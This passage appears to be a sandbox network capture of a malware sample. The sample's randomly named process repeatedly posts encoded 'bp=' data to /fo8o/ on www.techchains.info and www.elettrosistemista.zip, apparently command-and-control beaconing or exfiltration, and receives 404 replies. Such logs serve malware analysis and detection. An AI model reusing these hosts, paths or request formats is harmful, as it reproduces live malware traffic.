6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 38 6e 51 5a 53 52 75 43 52 4d 53 61 68 49 73 7a 47 4e 79 79 56 42 6f 30 43 49 6a 72 37 53 73 59 6e 36 30 39 74 77 3d Data Ascii: bp=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI8nQZSRuCRMSahIszGNyyVBo0CIjr7SsYn609tw=
Jan 6, 2025 14:35:07.563116074 CET	637	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 13:35:07 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49989	66.29.149.46	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:09.475445032 CET	800	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 44 30 42 67 56 75 4d 50 45 43 45 71 45 6a 36 6c 52 47 34 69 32 55 37 65 5a 33 6f 75 58 2f 52 73 2b 46 6d 46 4e Data Ascii: bp=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpD0BgVuMPECEqEj6lRG4i2U7eZ3ouX/Rs+FmFN
Jan 6, 2025 14:35:10.065665007 CET	637	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 13:35:09 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49990	66.29.149.46	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:12.010121107 CET	1817	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 56 4d 79 77 42 4d 2f 6e 74 50 61 42 6b 57 73 67 36 6c 52 57 39 61 68 53 39 48 52 2f 70 76 2f 71 46 59 78 43 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 56 57 37 4d 4a 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 6f 4c [TRUNCATED] Data Ascii: bp=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1yVMywBM/ntPaBkWsg6lRW9ahS9HR/pv/qFYxCS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JVW7MJLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpujvRh4ZoEGHiegByUvb1M5qwhQSDlRkp0e8S8VpcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyNeNQtzD3qWuxSTmhP3rLqvAXgwdN9w/Tb2N80mcSLMi1Yr1hmzkZxo7kTH/DuDHPROmGg//8IkAbpDdAmV7HCf6T9siapFA6q/EEOeeLtU4qr27rYFjeh5udexbT30M9Oimqu12VsUlyr+ANXUFZ306OFN/h6IdECQKyBtB3n5iMmORDGiQ3CgrxsPAORyXyVMr33le3eV8xPwPxIsS289K7/Bt2El+zKwYkfPbJJGFJQu1NtynXxeE38+yGvFI59eiItItg8Q3g9hopAWVmVppI9IPgiQbe3CTGqsUpjc8/VdGOxW4z4ELoRubrBT8xnNTOa2hRwdJ0mTqyzwNzv6a6/l3pXdnu4EG5Z9M4yoaZ86GyF6WCGMePiAJfN1SnZJpqse5i7fSn/dSPgdjPlEcPbUzIC4zvUw6i5djlpNQMLfwIJ4PDxFBB6uEjMmVNiN74MJLmIbpcqPUqgLxY0uOFKUZZXUBBOnQEetVKAjAtPjqjkSEPXD7P/o/HxsFG1gN1ks4EJETWPxSBYWH [TRUNCATED]
Jan 6, 2025 14:35:12.644195080 CET	637	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 13:35:12 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49991	66.29.149.46	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:14.543450117 CET	516	OUT	GET /fo8o/?bp=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd68f41LHWk1tWVOcLO2B4JSrTHSWnbApQ5HDH0jFdh0bEA==&XHI=wJbPZ8pHe HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 6, 2025 14:35:15.139717102 CET	652	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 13:35:15 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49992	195.110.124.133	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:20.282535076 CET	798	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 7a 34 33 79 49 4d 31 49 66 4f 5a 37 6d 56 63 63 63 59 38 54 78 48 2b 6d 35 38 45 55 66 48 79 67 4b 62 4b 62 65 45 3d Data Ascii: bp=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiz43yIM1IfOZ7mVcccY8TxH+m58EUfHygKbKbeE=
Jan 6, 2025 14:35:20.950681925 CET	367	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 13:35:20 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49993	195.110.124.133	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:22.820125103 CET	818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 76 56 6d 36 55 79 52 6f 61 61 36 70 4c 36 46 4a 51 39 75 2f 76 75 6f 36 66 32 62 6f 4c 45 79 6f 71 74 6e 42 52 77 Data Ascii: bp=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxvVm6UyRoaa6pL6FJQ9u/vuo6f2boLEyoqtnBRw
Jan 6, 2025 14:35:23.505486965 CET	367	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 13:35:23 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49994	195.110.124.133	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:25.353634119 CET	1835	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 43 66 2f 2f 71 30 52 61 49 71 70 39 59 76 73 4b 61 30 53 35 6f 2f 44 76 4a 37 39 53 36 53 68 7a 75 48 2b 33 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 58 52 70 75 69 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 75 76 [TRUNCATED] Data Ascii: bp=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKCf//q0RaIqp9YvsKa0S5o/DvJ79S6ShzuH+33Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHXRpuiCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adEqPPSb596q02+bm10h/KbfXTSTOac3EfjuVQou72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQYK911v/jw+PvZPYENr7STg8l0F3Ck6zV/xq1Dwgu7JJlRF+hAwxxua7LvS1AAdhBU1HBZstoRWAHyLbMWL7UzFXXPMllHfqBBFn5xU9fUOjVkD57bXun2hTR7+B3omt0GagFXgV9C43jnm0Z75arUxuHyRsw6jHloDTJUUv0x+RGZxA480KZmNeLnxJB7gRXwcZ3ObkUZdNYgtX5mu2bWtzVzhWkv2jaEmpvKYj0gX7vQpGNVz/jEIunuuC6hWo22PkhTxBptpyk2r6lwkrb0tv/hbsCsaLWX8fcmD0/i2PSXddJXQXobz8OjWYV1zT2iFUU